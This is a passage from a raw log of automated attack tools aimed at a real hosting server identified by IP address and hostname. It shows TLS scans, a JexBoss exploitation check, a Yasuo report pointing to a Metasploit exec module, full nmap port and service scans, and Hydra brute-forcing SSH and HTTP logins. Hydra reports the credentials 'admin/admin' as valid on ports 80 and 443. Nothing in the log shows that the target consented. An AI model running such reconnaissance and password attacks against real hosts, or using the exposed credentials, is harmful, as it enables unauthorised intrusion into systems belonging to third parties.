  2160. http://173.237.136.21:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
  2161.  
  2162. Version: 1.11.12-static
  2163. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2164.  
  2165. Connected to 173.237.136.21
  2166.  
  2167. Testing SSL server 173.237.136.21 on port 8443 using SNI name 173.237.136.21
  2168.  
  2169. TLS Fallback SCSV:
  2170. Server supports TLS Fallback SCSV
  2171.  
  2172. TLS renegotiation:
  2173. Secure session renegotiation supported
  2174.  
  2175. TLS Compression:
  2176. Compression disabled
  2177.  
  2178. Heartbleed:
  2179. TLS 1.2 not vulnerable to heartbleed
  2180. TLS 1.1 not vulnerable to heartbleed
  2181. TLS 1.0 not vulnerable to heartbleed
  2182.  
  2183. Supported Server Cipher(s):
  2184. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2185. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  2186. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2187. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  2188. Accepted TLSv1.2 256 bits AES256-SHA256
  2189. Accepted TLSv1.2 256 bits AES256-SHA
  2190. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2191. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  2192. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2193. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  2194. Accepted TLSv1.2 128 bits AES128-SHA256
  2195. Accepted TLSv1.2 128 bits AES128-SHA
  2196. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2197. Accepted TLSv1.2 112 bits DES-CBC3-SHA
  2198. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2199. Accepted TLSv1.1 256 bits AES256-SHA
  2200. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2201. Accepted TLSv1.1 128 bits AES128-SHA
  2202. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2203. Accepted TLSv1.1 112 bits DES-CBC3-SHA
  2204. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2205. Accepted TLSv1.0 256 bits AES256-SHA
  2206. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2207. Accepted TLSv1.0 128 bits AES128-SHA
  2208. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2209. Accepted TLSv1.0 112 bits DES-CBC3-SHA
  2210.  
  2211. SSL Certificate:
  2212. Signature Algorithm: sha256WithRSAEncryption
  2213. RSA Key Strength: 2048
  2214.  
  2215. Subject: *.myserverhosts.com
  2216. Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
  2217. Issuer: COMODO RSA Domain Validation Secure Server CA
  2218.  
  2219. Not valid before: Jun 8 00:00:00 2018 GMT
  2220. Not valid after: Jun 8 23:59:59 2020 GMT
  2221.  
  2222.  
  2223.  
  2224. AVAILABLE PLUGINS
  2225. -----------------
  2226.  
  2227. PluginSessionResumption
  2228. PluginOpenSSLCipherSuites
  2229. PluginChromeSha1Deprecation
  2230. PluginHeartbleed
  2231. PluginSessionRenegotiation
  2232. PluginCompression
  2233. PluginCertInfo
  2234. PluginHSTS
  2235.  
  2236.  
  2237.  
  2238. CHECKING HOST(S) AVAILABILITY
  2239. -----------------------------
  2240.  
  2241. 173.237.136.21:8443 => 173.237.136.21:8443
  2242.  
  2243.  
  2244.  
  2245. SCAN RESULTS FOR 173.237.136.21:8443 - 173.237.136.21:8443
  2246. ----------------------------------------------------------
  2247.  
  2248. * Deflate Compression:
  2249. OK - Compression disabled
  2250.  
  2251. * Session Renegotiation:
  2252. Client-initiated Renegotiations: OK - Rejected
  2253. Secure Renegotiation: OK - Supported
  2254.  
  2255. * Certificate - Content:
  2256. SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
  2257. Common Name: *.myserverhosts.com
  2258. Issuer: COMODO RSA Domain Validation Secure Server CA
  2259. Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
  2260. Not Before: Jun 8 00:00:00 2018 GMT
  2261. Not After: Jun 8 23:59:59 2020 GMT
  2262. Signature Algorithm: sha256WithRSAEncryption
  2263. Public Key Algorithm: rsaEncryption
  2264. Key Size: 2048 bit
  2265. Exponent: 65537 (0x10001)
  2266. X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
  2267.  
  2268. * Certificate - Trust:
  2269. Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
  2270. Google CA Store (09/2015): OK - Certificate is trusted
  2271. Java 6 CA Store (Update 65): OK - Certificate is trusted
  2272. Microsoft CA Store (09/2015): OK - Certificate is trusted
  2273. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  2274. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  2275. Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  2276.  
  2277. * Certificate - OCSP Stapling:
  2278. NOT SUPPORTED - Server did not send back an OCSP response.
  2279.  
  2280. * Session Resumption:
  2281. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2282. With TLS Session Tickets: OK - Supported
  2283.  
  2284. * SSLV2 Cipher Suites:
  2285. Server rejected all cipher suites.
  2286.  
  2287. * SSLV3 Cipher Suites:
  2288. Undefined - An unexpected error happened:
  2289. SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
  2290. SRP-3DES-EDE-CBC-SHA timeout - timed out
  2291. PSK-3DES-EDE-CBC-SHA timeout - timed out
  2292. EXP-RC4-MD5 timeout - timed out
  2293. EXP-RC2-CBC-MD5 timeout - timed out
  2294. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  2295. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  2296. EXP-DES-CBC-SHA timeout - timed out
  2297. EXP-ADH-RC4-MD5 timeout - timed out
  2298. EXP-ADH-DES-CBC-SHA timeout - timed out
  2299. EDH-RSA-DES-CBC3-SHA timeout - timed out
  2300. EDH-RSA-DES-CBC-SHA timeout - timed out
  2301. EDH-DSS-DES-CBC3-SHA timeout - timed out
  2302. EDH-DSS-DES-CBC-SHA timeout - timed out
  2303. ECDHE-RSA-NULL-SHA timeout - timed out
  2304. ECDHE-ECDSA-NULL-SHA timeout - timed out
  2305. ECDH-RSA-NULL-SHA timeout - timed out
  2306. ECDH-RSA-DES-CBC3-SHA timeout - timed out
  2307. ECDH-ECDSA-NULL-SHA timeout - timed out
  2308. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
  2309. DH-RSA-DES-CBC3-SHA timeout - timed out
  2310. DH-RSA-DES-CBC-SHA timeout - timed out
  2311. DH-DSS-DES-CBC3-SHA timeout - timed out
  2312. DH-DSS-DES-CBC-SHA timeout - timed out
  2313. DES-CBC3-SHA timeout - timed out
  2314. DES-CBC-SHA timeout - timed out
  2315. AECDH-NULL-SHA timeout - timed out
  2316. AECDH-DES-CBC3-SHA timeout - timed out
  2317. ADH-DES-CBC3-SHA timeout - timed out
  2318. ADH-DES-CBC-SHA timeout - timed out
  2319.  
  2320.  
  2321. #######################################################################################################################################
  2322.  
  2323.  
  2324.  
  2325. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  2326. | * And others Java Deserialization Vulnerabilities * |
  2327. | |
  2328. | @author: João Filho Matos Figueiredo |
  2329. | @contact: joaomatosf@gmail.com |
  2330. | |
  2331. | @update: https://github.com/joaomatosf/jexboss |
  2332. #______________________________________________________#
  2333.  
  2334. @version: 1.2.4
  2335.  
  2336. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2337.  
  2338.  
  2339. ** Checking Host: https://173.237.136.21:8443 **
  2340.  
  2341. [*] Checking admin-console: [ OK ]
  2342. [*] Checking Struts2: [ OK ]
  2343. [*] Checking Servlet Deserialization: [ OK ]
  2344. [*] Checking Application Deserialization: [ OK ]
  2345. [*] Checking Jenkins: [ OK ]
  2346. [*] Checking web-console: [ OK ]
  2347. [*] Checking jmx-console: [ OK ]
  2348. [*] Checking JMXInvokerServlet: [ OK ]
  2349.  
  2350.  
  2351. * Results:
  2352. The server is not vulnerable to bugs tested ... :D
  2353.  
  2354. * Info: review, suggestions, updates, etc:
  2355. https://github.com/joaomatosf/jexboss
  2356.  
  2357. * DONATE: Please consider making a donation to help improve this tool,
  2358. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
  2359.  
  2360. #######################################################################################################################################
  2361.  
  2362. I, [2018-11-23T00:16:41.569567 #12203] INFO -- : Initiating port scan
  2363. I, [2018-11-23T00:17:42.345289 #12203] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-16-41.xml
  2364. I, [2018-11-23T00:17:42.346515 #12203] INFO -- : Discovered open port: 173.237.136.21:80
  2365. I, [2018-11-23T00:17:43.324894 #12203] INFO -- : Discovered open port: 173.237.136.21:443
  2366. I, [2018-11-23T00:17:45.121214 #12203] INFO -- : Discovered open port: 173.237.136.21:465
  2367. I, [2018-11-23T00:17:46.524137 #12203] INFO -- : Discovered open port: 173.237.136.21:993
  2368. I, [2018-11-23T00:17:48.741643 #12203] INFO -- : Discovered open port: 173.237.136.21:995
  2369. I, [2018-11-23T00:17:50.962609 #12203] INFO -- : Discovered open port: 173.237.136.21:8443
  2370. I, [2018-11-23T00:17:52.776201 #12203] INFO -- : <<<Enumerating vulnerable applications>>>
  2371.  
  2372.  
  2373. --------------------------------------------------------
  2374. <<<Yasuo discovered following vulnerable applications>>>
  2375. --------------------------------------------------------
  2376. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
  2377. | App Name | URL to Application | Potential Exploit | Username | Password |
  2378. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
  2379. | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  2380. | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  2381. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
  2382. #######################################################################################################################################
  2383. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:21 EST
  2384. NSE: Loaded 148 scripts for scanning.
  2385. NSE: Script Pre-scanning.
  2386. Initiating NSE at 00:22
  2387. Completed NSE at 00:22, 0.00s elapsed
  2388. Initiating NSE at 00:22
  2389. Completed NSE at 00:22, 0.00s elapsed
  2390. Initiating Parallel DNS resolution of 1 host. at 00:22
  2391. Completed Parallel DNS resolution of 1 host. at 00:22, 16.51s elapsed
  2392. Initiating SYN Stealth Scan at 00:22
  2393. Scanning 173.237.136.21 [474 ports]
  2394. Discovered open port 80/tcp on 173.237.136.21
  2395. Discovered open port 993/tcp on 173.237.136.21
  2396. Discovered open port 3306/tcp on 173.237.136.21
  2397. Discovered open port 53/tcp on 173.237.136.21
  2398. Discovered open port 22/tcp on 173.237.136.21
  2399. Discovered open port 143/tcp on 173.237.136.21
  2400. Discovered open port 587/tcp on 173.237.136.21
  2401. Discovered open port 995/tcp on 173.237.136.21
  2402. Discovered open port 110/tcp on 173.237.136.21
  2403. Discovered open port 21/tcp on 173.237.136.21
  2404. Discovered open port 443/tcp on 173.237.136.21
  2405. Discovered open port 8080/tcp on 173.237.136.21
  2406. Discovered open port 465/tcp on 173.237.136.21
  2407. Discovered open port 8443/tcp on 173.237.136.21
  2408. Completed SYN Stealth Scan at 00:22, 4.55s elapsed (474 total ports)
  2409. Initiating Service scan at 00:22
  2410. Scanning 14 services on 173.237.136.21
  2411. Completed Service scan at 00:22, 33.92s elapsed (14 services on 1 host)
  2412. Initiating OS detection (try #1) against 173.237.136.21
  2413. Retrying OS detection (try #2) against 173.237.136.21
  2414. WARNING: OS didn't match until try #2
  2415. Initiating Traceroute at 00:23
  2416. Completed Traceroute at 00:23, 0.22s elapsed
  2417. Initiating Parallel DNS resolution of 2 hosts. at 00:23
  2418. Completed Parallel DNS resolution of 2 hosts. at 00:23, 16.50s elapsed
  2419. NSE: Script scanning 173.237.136.21.
  2420. Initiating NSE at 00:23
  2421. Completed NSE at 00:25, 140.31s elapsed
  2422. Initiating NSE at 00:25
  2423. Completed NSE at 00:25, 0.46s elapsed
  2424. Nmap scan report for 173.237.136.21
  2425. Host is up (0.13s latency).
  2426. Not shown: 457 closed ports
  2427. PORT STATE SERVICE VERSION
  2428. 21/tcp open ftp Pure-FTPd
  2429. | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
  2430. | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
  2431. | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
  2432. | Public Key type: rsa
  2433. | Public Key bits: 2048
  2434. | Signature Algorithm: sha256WithRSAEncryption
  2435. | Not valid before: 2018-05-03T00:00:00
  2436. | Not valid after: 2019-05-03T23:59:59
  2437. | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
  2438. |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
  2439. |_ssl-date: 2018-11-23T05:23:22+00:00; 0s from scanner time.
  2440. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  2441. | ssh-hostkey:
  2442. | 1024 cc:18:eb:be:f1:bf:95:33:27:e7:9d:46:4b:f7:5e:51 (DSA)
  2443. |_ 2048 02:20:0f:ee:ae:39:1e:aa:8c:36:e5:00:af:2f:43:ff (RSA)
  2444. 23/tcp filtered telnet
  2445. 53/tcp open domain?
  2446. 80/tcp open http-proxy Squid http proxy
  2447. | http-methods:
  2448. |_ Supported Methods: GET HEAD POST OPTIONS
  2449. |_http-open-proxy: Proxy might be redirecting requests
  2450. |_http-title: Site doesn't have a title (text/html).
  2451. 110/tcp open pop3 Dovecot pop3d
  2452. |_pop3-capabilities: CAPA UIDL PIPELINING SASL(PLAIN LOGIN) USER TOP STLS AUTH-RESP-CODE RESP-CODES
  2453. |_ssl-date: 2018-11-23T05:23:25+00:00; 0s from scanner time.
  2454. 143/tcp open imap Dovecot imapd
  2455. |_imap-capabilities: LITERAL+ listed ENABLE IDLE NAMESPACE LOGIN-REFERRALS Pre-login capabilities post-login ID SASL-IR have OK AUTH=LOGINA0001 AUTH=PLAIN more STARTTLS IMAP4rev1
  2456. |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
  2457. 443/tcp open ssl/http nginx 1.14.0
  2458. | http-methods:
  2459. |_ Supported Methods: GET HEAD POST OPTIONS
  2460. |_http-server-header: nginx/1.14.0
  2461. |_http-title: Site doesn't have a title (text/html).
  2462. | ssl-cert: Subject: commonName=*.myserverhosts.com
  2463. | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
  2464. | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
  2465. | Public Key type: rsa
  2466. | Public Key bits: 2048
  2467. | Signature Algorithm: sha256WithRSAEncryption
  2468. | Not valid before: 2018-06-08T00:00:00
  2469. | Not valid after: 2020-06-08T23:59:59
  2470. | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
  2471. |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
  2472. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
  2473. | tls-nextprotoneg:
  2474. | h2
  2475. |_ http/1.1
  2476. 465/tcp open ssl/smtp Exim smtpd 4.91
  2477. |_smtp-commands: Couldn't establish connection on port 465
  2478. | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
  2479. | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
  2480. | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
  2481. | Public Key type: rsa
  2482. | Public Key bits: 2048
  2483. | Signature Algorithm: sha256WithRSAEncryption
  2484. | Not valid before: 2018-05-03T00:00:00
  2485. | Not valid after: 2019-05-03T23:59:59
  2486. | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
  2487. |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
  2488. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
  2489. 587/tcp open smtp Exim smtpd 4.91
  2490. | smtp-commands: uscentral22.myserverhosts.com Hello nmap.scanme.org [185.244.213.149], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
  2491. |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
  2492. | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
  2493. | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
  2494. | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
  2495. | Public Key type: rsa
  2496. | Public Key bits: 2048
  2497. | Signature Algorithm: sha256WithRSAEncryption
  2498. | Not valid before: 2018-05-03T00:00:00
  2499. | Not valid after: 2019-05-03T23:59:59
  2500. | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
  2501. |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
  2502. |_ssl-date: 2018-11-23T05:23:20+00:00; 0s from scanner time.
  2503. 993/tcp open ssl/imaps?
  2504. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
  2505. 995/tcp open ssl/pop3s?
  2506. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
  2507. 3306/tcp open mysql MySQL 5.5.51-38.2
  2508. | mysql-info:
  2509. | Protocol: 10
  2510. | Version: 5.5.51-38.2
  2511. | Thread ID: 34070279
  2512. | Capabilities flags: 63487
  2513. | Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, FoundRows, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsTransactions, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, ODBCClient, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
  2514. | Status: Autocommit
  2515. | Salt: fCYt__?Z)YfwC)BOFQC;
  2516. |_ Auth Plugin Name: 84
  2517. 7777/tcp filtered cbt
  2518. 8080/tcp open http nginx 1.14.0
  2519. | http-methods:
  2520. |_ Supported Methods: GET HEAD POST OPTIONS
  2521. |_http-server-header: nginx/1.14.0
  2522. |_http-title: Site doesn't have a title (text/html).
  2523. 8443/tcp open ssl/http nginx 1.14.0
  2524. | http-methods:
  2525. |_ Supported Methods: GET HEAD POST OPTIONS
  2526. |_http-server-header: nginx/1.14.0
  2527. |_http-title: Site doesn't have a title (text/html).
  2528. | ssl-cert: Subject: commonName=*.myserverhosts.com
  2529. | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
  2530. | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
  2531. | Public Key type: rsa
  2532. | Public Key bits: 2048
  2533. | Signature Algorithm: sha256WithRSAEncryption
  2534. | Not valid before: 2018-06-08T00:00:00
  2535. | Not valid after: 2020-06-08T23:59:59
  2536. | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
  2537. |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
  2538. |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
  2539. | tls-nextprotoneg:
  2540. | h2
  2541. |_ http/1.1
  2542. 49152/tcp filtered unknown
  2543. Device type: WAP|router|storage-misc
  2544. Running: Linux 2.4.X|2.6.X, MikroTik RouterOS 5.X, Netgear RAIDiator 4.X
  2545. OS CPE: cpe:/o:linux:linux_kernel:2.4.36 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35 cpe:/o:netgear:raidiator:4.1.4
  2546. OS details: DD-WRT v23 (Linux 2.4.36), MikroTik RouterOS 5.25 (Linux 2.6.35), Netgear ReadyNAS Duo NAS device (RAIDiator 4.1.4)
  2547. Uptime guess: 301.013 days (since Fri Jan 26 00:07:11 2018)
  2548. Network Distance: 2 hops
  2549. Service Info: Host: uscentral22.myserverhosts.com
  2550.  
  2551. TRACEROUTE (using port 25/tcp)
  2552. HOP RTT ADDRESS
  2553. 1 103.19 ms 10.251.200.1
  2554. 2 103.15 ms 173.237.136.21
  2555.  
  2556. NSE: Script Post-scanning.
  2557. Initiating NSE at 00:25
  2558. Completed NSE at 00:25, 0.00s elapsed
  2559. Initiating NSE at 00:25
  2560. Completed NSE at 00:25, 0.00s elapsed
  2561. Read data files from: /usr/bin/../share/nmap
  2562. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2563. Nmap done: 1 IP address (1 host up) scanned in 218.42 seconds
  2564. Raw packets sent: 599 (28.512KB) | Rcvd: 556 (25.098KB)
  2565. #######################################################################################################################################
  2566. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:25 EST
  2567. NSE: Loaded 148 scripts for scanning.
  2568. NSE: Script Pre-scanning.
  2569. Initiating NSE at 00:25
  2570. Completed NSE at 00:25, 0.00s elapsed
  2571. Initiating NSE at 00:25
  2572. Completed NSE at 00:25, 0.00s elapsed
  2573. Initiating Parallel DNS resolution of 1 host. at 00:25
  2574. Completed Parallel DNS resolution of 1 host. at 00:25, 16.50s elapsed
  2575. Initiating UDP Scan at 00:25
  2576. Scanning 173.237.136.21 [14 ports]
  2577. Discovered open port 53/udp on 173.237.136.21
  2578. Completed UDP Scan at 00:26, 6.57s elapsed (14 total ports)
  2579. Initiating Service scan at 00:26
  2580. Scanning 1 service on 173.237.136.21
  2581. Completed Service scan at 00:26, 15.02s elapsed (1 service on 1 host)
  2582. Initiating OS detection (try #1) against 173.237.136.21
  2583. Retrying OS detection (try #2) against 173.237.136.21
  2584. Initiating Traceroute at 00:26
  2585. Completed Traceroute at 00:26, 7.16s elapsed
  2586. Initiating Parallel DNS resolution of 1 host. at 00:26
  2587. Completed Parallel DNS resolution of 1 host. at 00:26, 16.50s elapsed
  2588. NSE: Script scanning 173.237.136.21.
  2589. Initiating NSE at 00:26
  2590. Completed NSE at 00:26, 0.45s elapsed
  2591. Initiating NSE at 00:26
  2592. Completed NSE at 00:26, 0.00s elapsed
  2593. Nmap scan report for 173.237.136.21
  2594. Host is up (0.21s latency).
  2595.  
  2596. PORT STATE SERVICE VERSION
  2597. 53/udp open domain (generic dns response: FORMERR)
  2598. | fingerprint-strings:
  2599. | NBTStat:
  2600. |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  2601. 67/udp closed dhcps
  2602. 68/udp closed dhcpc
  2603. 69/udp closed tftp
  2604. 88/udp closed kerberos-sec
  2605. 123/udp closed ntp
  2606. 137/udp filtered netbios-ns
  2607. 138/udp filtered netbios-dgm
  2608. 139/udp closed netbios-ssn
  2609. 161/udp closed snmp
  2610. 162/udp closed snmptrap
  2611. 389/udp closed ldap
  2612. 520/udp closed route
  2613. 2049/udp closed nfs
  2614. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  2615. SF-Port53-UDP:V=7.70%I=7%D=11/23%Time=5BF78F6F%P=x86_64-pc-linux-gnu%r(DNS
  2616. SF:VersionBindReq,C,"\0\x06\x81\x04\0\0\0\0\0\0\0\0")%r(DNSStatusRequest,C
  2617. SF:,"\0\0\x90\x01\0\0\0\0\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x05\0\x01\0
  2618. SF:\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
  2619. Too many fingerprints match this host to give specific OS details
  2620. Network Distance: 12 hops
  2621.  
  2622. TRACEROUTE (using port 138/udp)
  2623. HOP RTT ADDRESS
  2624. 1 ... 2
  2625. 3 102.71 ms 10.251.200.1
  2626. 4 ... 5
  2627. 6 104.13 ms 10.251.200.1
  2628. 7 105.10 ms 10.251.200.1
  2629. 8 105.09 ms 10.251.200.1
  2630. 9 105.08 ms 10.251.200.1
  2631. 10 105.05 ms 10.251.200.1
  2632. 11 104.87 ms 10.251.200.1
  2633. 12 104.87 ms 10.251.200.1
  2634. 13 ... 18
  2635. 19 103.61 ms 10.251.200.1
  2636. 20 104.32 ms 10.251.200.1
  2637. 21 103.29 ms 10.251.200.1
  2638. 22 ... 29
  2639. 30 104.00 ms 10.251.200.1
  2640.  
  2641. NSE: Script Post-scanning.
  2642. Initiating NSE at 00:26
  2643. Completed NSE at 00:26, 0.00s elapsed
  2644. Initiating NSE at 00:26
  2645. Completed NSE at 00:26, 0.00s elapsed
  2646. Read data files from: /usr/bin/../share/nmap
  2647. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2648. Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds
  2649. Raw packets sent: 124 (5.705KB) | Rcvd: 91 (8.627KB)
  2650. #######################################################################################################################################
  2651. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:26 EST
  2652. Nmap scan report for 173.237.136.21
  2653. Host is up (0.20s latency).
  2654. Not shown: 16 closed ports, 1 filtered port
  2655. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2656. PORT STATE SERVICE
  2657. 21/tcp open ftp
  2658. 22/tcp open ssh
  2659. 53/tcp open domain
  2660. 80/tcp open http
  2661. 110/tcp open pop3
  2662. 443/tcp open https
  2663. 993/tcp open imaps
  2664. 3306/tcp open mysql
  2665. 8080/tcp open http-proxy
  2666. #######################################################################################################################################
  2667. 1 of 1 target completed, 0 valid passwords found
  2668. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:42
  2669. + -- --=[Port 22 opened... running tests...
  2670. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2671.  
  2672. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
  2673. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
  2674. [DATA] attacking ssh://173.237.136.21:22/
  2675. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2676.  
  2677. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
  2678. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2679. [DATA] attacking ssh://173.237.136.21:22/
  2680. + -- --=[Port 23 closed... skipping.
  2681. + -- --=[Port 25 closed... skipping.
  2682. + -- --=[Port 80 opened... running tests...
  2683. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2684.  
  2685. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:43
  2686. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2687. [DATA] attacking http-get://173.237.136.21:80//
  2688. [80][http-get] host: 173.237.136.21 login: admin password: admin
  2689. [STATUS] attack finished for 173.237.136.21 (valid pair found)
  2690. 1 of 1 target successfully completed, 1 valid password found
  2691. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:44
  2692. + -- --=[Port 110 opened... running tests...
  2693. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2694.  
  2695. + -- --=[Port 443 opened... running tests...
  2696. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2697.  
  2698. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:08:48
  2699. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2700. [DATA] attacking http-gets://173.237.136.21:443//
  2701. [443][http-get] host: 173.237.136.21 login: admin password: admin
  2702. [STATUS] attack finished for 173.237.136.21 (valid pair found)
  2703. 1 of 1 target successfully completed, 1 valid password found
  2704. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:08:49
  2705. + -- --=[Port 445 closed... skipping.
  2706. + -- --=[Port 512 closed... skipping.
  2707. + -- --=[Port 513 closed... skipping.
  2708. + -- --=[Port 514 closed... skipping.
  2709. + -- --=[Port 993 opened... running tests...
  2710. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2711.  
  2712. 1 of 1 target completed, 0 valid passwords found
  2713. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 15:59:55
  2714. + -- --=[Port 1433 closed... skipping.
  2715. + -- --=[Port 1521 closed... skipping.
  2716. + -- --=[Port 3306 opened... running tests...
